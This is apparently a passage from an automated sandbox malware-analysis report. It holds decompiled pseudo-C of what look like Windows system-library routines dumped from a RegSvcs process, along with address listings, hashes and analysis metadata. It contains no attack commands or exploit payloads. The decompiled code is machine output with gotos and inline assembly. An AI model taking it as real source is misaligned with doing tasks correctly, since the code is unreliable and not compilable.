							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0137500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01339860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                          0x013751be
                                          0x013751c3
                                          0x013751c8
                                          0x013751cd
                                          0x013751d0
                                          0x013751d3
                                          0x013751d8
                                          0x013751db
                                          0x013751de
                                          0x013751e0
                                          0x013751e3
                                          0x013751e6
                                          0x013751e8
                                          0x01375342
                                          0x01375351
                                          0x01375356
                                          0x0137535a
                                          0x01375360
                                          0x01375363
                                          0x01375366
                                          0x01375369
                                          0x01375369
                                          0x0137536b
                                          0x0137536b
                                          0x01375370
                                          0x013753a3
                                          0x013753a4
                                          0x013753a6
                                          0x013753ab
                                          0x013753ab
                                          0x013753ae
                                          0x013753ae
                                          0x013753b5
                                          0x013753bf
                                          0x013753bf
                                          0x01375375
                                          0x01375396
                                          0x013753a0
                                          0x013753a0
                                          0x00000000
                                          0x01375396
                                          0x01375377
                                          0x01375379
                                          0x0137537f
                                          0x0137538c
                                          0x01375390
                                          0x00000000
                                          0x01375390
                                          0x013751ee
                                          0x013751f1
                                          0x01375301
                                          0x01375310
                                          0x01375315
                                          0x01375318
                                          0x0137531b
                                          0x01375320
                                          0x0137532e
                                          0x01375331
                                          0x00000000
                                          0x01375331
                                          0x01375328
                                          0x01375329
                                          0x00000000
                                          0x01375329
                                          0x013751fa
                                          0x01375235
                                          0x01375236
                                          0x01375239
                                          0x0137523f
                                          0x01375240
                                          0x01375241
                                          0x01375242
                                          0x01375246
                                          0x01375247
                                          0x0137524e
                                          0x01375251
                                          0x01375267
                                          0x01375269
                                          0x0137526e
                                          0x0137527d
                                          0x0137527e
                                          0x01375281
                                          0x01375282
                                          0x01375287
                                          0x01375288
                                          0x0137528a
                                          0x0137528f
                                          0x01375294
                                          0x00000000
                                          0x00000000
                                          0x0137529a
                                          0x0137529c
                                          0x0137529e
                                          0x0137529e
                                          0x013752a4
                                          0x013752b0
                                          0x00000000
                                          0x00000000
                                          0x013752ba
                                          0x013752bc
                                          0x013752bc
                                          0x013752d4
                                          0x013752d9
                                          0x013752dc
                                          0x013752e1
                                          0x00000000
                                          0x00000000
                                          0x013752e7
                                          0x013752f4
                                          0x00000000
                                          0x013752f4
                                          0x01375270
                                          0x00000000
                                          0x01375270
                                          0x013751fc
                                          0x013751fd
                                          0x01375202
                                          0x01375203
                                          0x01375205
                                          0x0137520a
                                          0x0137520f
                                          0x00000000
                                          0x00000000
                                          0x0137521b
                                          0x01375226
                                          0x0137522b
                                          0x0137521d
                                          0x0137521d
                                          0x01375222
                                          0x01375222
                                          0x0137522d
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: b8e105cec926e3fce1111311e88981da2869f6f2a6c8a2ab526a0c234c4d8e7b
                                          • Instruction ID: 6c50651d287ec8df6f67ec2d92bb424b736214569cf030a7cd2aa210ca7015f6
                                          • Opcode Fuzzy Hash: b8e105cec926e3fce1111311e88981da2869f6f2a6c8a2ab526a0c234c4d8e7b
                                          • Instruction Fuzzy Hash: A4517F71E046099FEB29DFA8C880BADBBF8FF58708F14442DE649EB251DB759901CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0130D5E0 Relevance: 1.9, APIs: 1, Instructions: 353timeCOMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E0130D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x13ed360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E01306600(0x13e52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x13e7b9c; // 0x0
							_t281 = L01314620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0133F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x13e7b90; // 0x77d30000
								if(_t384 == 0) {
									_t353 =  *0x13e7b8c; // 0xe93d80
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01312280(_t200, 0x13e84d8);
									_t277 =  *0x13e85f4; // 0xe91ff0
									_t351 =  *0x13e85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xe91f88
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0130FFB0(_t287, _t353, 0x13e84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0134CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E01306600(0x13e52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E01307926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x13eb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0137E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x13e8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x13eb218; // 0x0
														asm("ror edi, cl");
														 *0x13eb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01312280(_t250, 0x13e84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01333898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0130FFB0(_t293, _t353, 0x13e84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E013337F5(_t353, 0);
																}
																E01330413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01329B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E013202D6(_t174);
																}
																L013177F0( *0x13e7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0132C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0130EC7F(_t353);
										L013219B8(_t287, 0, _t353, 0);
										_t200 = E012FF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0133B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x13eb2f8; // 0x0
									if((_t206 |  *0x13eb2fc) == 0 || ( *0x13eb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x13eb2ec; // 0x0
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E013A6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E013A6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0130E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0130EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E01339730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0130E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L01308F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01333C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                          0x0130d5f2
                                          0x0130d5f5
                                          0x0130d5f5
                                          0x0130d5fd
                                          0x0130d600
                                          0x0130d60a
                                          0x0130d60d
                                          0x0130d617
                                          0x0130d61d
                                          0x0130d627
                                          0x0130d62e
                                          0x0130d911
                                          0x0130d913
                                          0x00000000
                                          0x0130d919
                                          0x0130d919
                                          0x0130d919
                                          0x0130d634
                                          0x0130d634
                                          0x0130d634
                                          0x0130d634
                                          0x0130d640
                                          0x0130d8bf
                                          0x00000000
                                          0x0130d646
                                          0x0130d646
                                          0x0130d64d
                                          0x0130d652
                                          0x0135b2fc
                                          0x0135b2fc
                                          0x0135b302
                                          0x0135b33b
                                          0x0135b341
                                          0x00000000
                                          0x0135b304
                                          0x0135b304
                                          0x0135b319
                                          0x0135b31e
                                          0x0135b324
                                          0x0135b326
                                          0x0135b332
                                          0x0135b347
                                          0x0135b34c
                                          0x0135b351
                                          0x0135b35a
                                          0x00000000
                                          0x0135b328
                                          0x0135b328
                                          0x00000000
                                          0x0135b328
                                          0x0135b326
                                          0x0130d658
                                          0x0130d658
                                          0x0130d65b
                                          0x0130d665
                                          0x00000000
                                          0x0130d66b
                                          0x0130d66b
                                          0x0130d66b
                                          0x0130d66b
                                          0x0130d66d
                                          0x0130d672
                                          0x0130d67a
                                          0x00000000
                                          0x00000000
                                          0x0130d680
                                          0x0130d686
                                          0x0130d8ce
                                          0x0130d8d4
                                          0x0130d8dd
                                          0x0130d8e0
                                          0x0130d68c
                                          0x0130d691
                                          0x0130d69d
                                          0x0130d6a2
                                          0x0130d6a7
                                          0x0130d6b0
                                          0x0130d6b5
                                          0x0130d6e0
                                          0x0130d6b7
                                          0x0130d6b7
                                          0x0130d6b9
                                          0x0130d6b9
                                          0x0130d6bb
                                          0x0130d6bd
                                          0x0130d6ce
                                          0x0130d6d0
                                          0x0130d6d2
                                          0x0135b363
                                          0x0135b365
                                          0x00000000
                                          0x0135b36b
                                          0x00000000
                                          0x0135b36b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0130d6bf
                                          0x0130d6bf
                                          0x0130d6e5
                                          0x0130d6e7
                                          0x0130d6e9
                                          0x0130d6ec
                                          0x0130d6ec
                                          0x0130d6ef
                                          0x0130d6f5
                                          0x0130d6f9
                                          0x0130d6fb
                                          0x0130d6fd
                                          0x0130d701
                                          0x0130d703
                                          0x0130d70a
                                          0x0130d70a
                                          0x0130d701
                                          0x0130d710
                                          0x0130d710
                                          0x0130d6c1
                                          0x0130d6c1
                                          0x0130d6c6
                                          0x0135b36d
                                          0x0135b36f
                                          0x00000000
                                          0x0135b375
                                          0x0135b375
                                          0x0135b375
                                          0x00000000
                                          0x0135b375
                                          0x00000000
                                          0x0130d6cc
                                          0x0130d6d8
                                          0x0130d6d8
                                          0x0130d6d8
                                          0x00000000
                                          0x0130d6c6
                                          0x0130d6bf
                                          0x00000000
                                          0x0130d6da
                                          0x0130d6da
                                          0x0130d716
                                          0x0130d71b
                                          0x0130d720
                                          0x0130d726
                                          0x0130d726
                                          0x0130d72d
                                          0x00000000
                                          0x0130d733
                                          0x0130d739
                                          0x0130d742
                                          0x0130d750
                                          0x0130d758
                                          0x0130d764
                                          0x0130d776
                                          0x0130d77a
                                          0x0130d783
                                          0x0130d928
                                          0x0130d92c
                                          0x0130d93d
                                          0x0130d944
                                          0x0130d94f
                                          0x0130d954
                                          0x0130d956
                                          0x0130d95f
                                          0x0130d961
                                          0x0130d973
                                          0x0130d973
                                          0x0130d956
                                          0x0130d944
                                          0x0130d92c
                                          0x0130d78b
                                          0x0135b394
                                          0x0130d791
                                          0x0130d798
                                          0x0135b3a3
                                          0x0135b3bb
                                          0x0135b3bb
                                          0x0130d7a5
                                          0x0130d866
                                          0x0130d870
                                          0x0130d884
                                          0x0130d892
                                          0x0130d898
                                          0x0130d89e
                                          0x0130d8a0
                                          0x0130d8a6
                                          0x0130d8ac
                                          0x0130d8ae
                                          0x0130d8b4
                                          0x0130d8b4
                                          0x0130d8ae
                                          0x0130d7a5
                                          0x0130d78b
                                          0x0130d7b1
                                          0x0135b3c5
                                          0x0135b3c5
                                          0x0130d7c3
                                          0x0130d7ca
                                          0x0130d7e5
                                          0x0130d7eb
                                          0x0130d8eb
                                          0x0130d8ed
                                          0x00000000
                                          0x0130d8f3
                                          0x0130d8f3
                                          0x0130d8f3
                                          0x00000000
                                          0x0130d8ed
                                          0x0130d7cc
                                          0x0130d7cc
                                          0x0130d7d2
                                          0x00000000
                                          0x0130d7d4
                                          0x0130d7d4
                                          0x0130d7d7
                                          0x0130d7df
                                          0x0135b3d4
                                          0x0135b3d9
                                          0x0135b3dc
                                          0x0135b3dc
                                          0x0135b3df
                                          0x0135b3e2
                                          0x0135b468
                                          0x0135b46d
                                          0x0135b46f
                                          0x0135b46f
                                          0x0135b475
                                          0x0130d8f8
                                          0x0130d8f9
                                          0x0130d8fd
                                          0x0135b3e8
                                          0x0135b3e8
                                          0x0135b3eb
                                          0x0135b3ed
                                          0x00000000
                                          0x0135b3ef
                                          0x0135b3ef
                                          0x0135b3f1
                                          0x0135b3f4
                                          0x0135b3fe
                                          0x0135b404
                                          0x0135b409
                                          0x0135b40e
                                          0x0135b410
                                          0x0135b410
                                          0x0135b414
                                          0x0135b414
                                          0x0135b41b
                                          0x0135b420
                                          0x0135b423
                                          0x0135b425
                                          0x0135b427
                                          0x0135b42a
                                          0x0135b42d
                                          0x0135b42d
                                          0x0135b42a
                                          0x0135b432
                                          0x0135b436
                                          0x0135b438
                                          0x0135b43b
                                          0x0135b43b
                                          0x0135b449
                                          0x0135b44e
                                          0x0135b454
                                          0x0135b458
                                          0x0135b458
                                          0x0135b45d
                                          0x00000000
                                          0x0135b45d
                                          0x0135b3ed
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0130d7df
                                          0x0130d7d2
                                          0x0130d7ca
                                          0x0135b37c
                                          0x0135b37e
                                          0x0135b385
                                          0x0135b38a
                                          0x00000000
                                          0x0135b38a
                                          0x0130d742
                                          0x0130d7f1
                                          0x0130d7f8
                                          0x0135b49b
                                          0x0135b49b
                                          0x0130d800
                                          0x0130d837
                                          0x0130d843
                                          0x0130d845
                                          0x0130d847
                                          0x0130d84a
                                          0x0130d84b
                                          0x0130d84e
                                          0x0130d857
                                          0x0130d802
                                          0x0130d802
                                          0x0130d80d
                                          0x00000000
                                          0x0130d818
                                          0x0130d818
                                          0x0130d824
                                          0x0130d831
                                          0x0135b4a5
                                          0x0135b4ab
                                          0x0135b4b3
                                          0x0135b4b8
                                          0x0135b4bb
                                          0x00000000
                                          0x0135b4c1
                                          0x0135b4c1
                                          0x0135b4c8
                                          0x00000000
                                          0x0135b4ce
                                          0x0135b4d4
                                          0x0135b4e1
                                          0x0135b4e3
                                          0x0135b4e5
                                          0x00000000
                                          0x0135b4eb
                                          0x0135b4f0
                                          0x0135b4f2
                                          0x0130dac9
                                          0x0130dacc
                                          0x0130dacf
                                          0x0130dad1
                                          0x0130dd78
                                          0x0130dd78
                                          0x0130dcf2
                                          0x00000000
                                          0x0130dad7
                                          0x0130dad9
                                          0x0130dadb
                                          0x00000000
                                          0x00000000
                                          0x0130dae1
                                          0x0130dae1
                                          0x0130dae4
                                          0x0130dae6
                                          0x0135b4f9
                                          0x0135b4f9
                                          0x0135b500
                                          0x0130daec
                                          0x0130daec
                                          0x0130daf5
                                          0x0130daf8
                                          0x0130dafb
                                          0x0130db03
                                          0x0130db11
                                          0x0130db16
                                          0x0130db19
                                          0x0130db1b
                                          0x0135b52c
                                          0x0135b531
                                          0x0135b534
                                          0x0130db21
                                          0x0130db21
                                          0x0130db24
                                          0x0130dcd9
                                          0x0130dce2
                                          0x0130dce5
                                          0x0130dd6a
                                          0x0130dd6d
                                          0x00000000
                                          0x0130dd73
                                          0x0135b51a
                                          0x0135b51c
                                          0x0135b51f
                                          0x0135b524
                                          0x00000000
                                          0x0135b524
                                          0x0130dce7
                                          0x0130dce7
                                          0x0130dce7
                                          0x00000000
                                          0x0130dce7
                                          0x00000000
                                          0x0130db2a
                                          0x0130db2c
                                          0x0130db31
                                          0x0130db33
                                          0x0130db36
                                          0x0130db39
                                          0x0130db3b
                                          0x0130db66
                                          0x0130db66
                                          0x0130db3d
                                          0x0130db3d
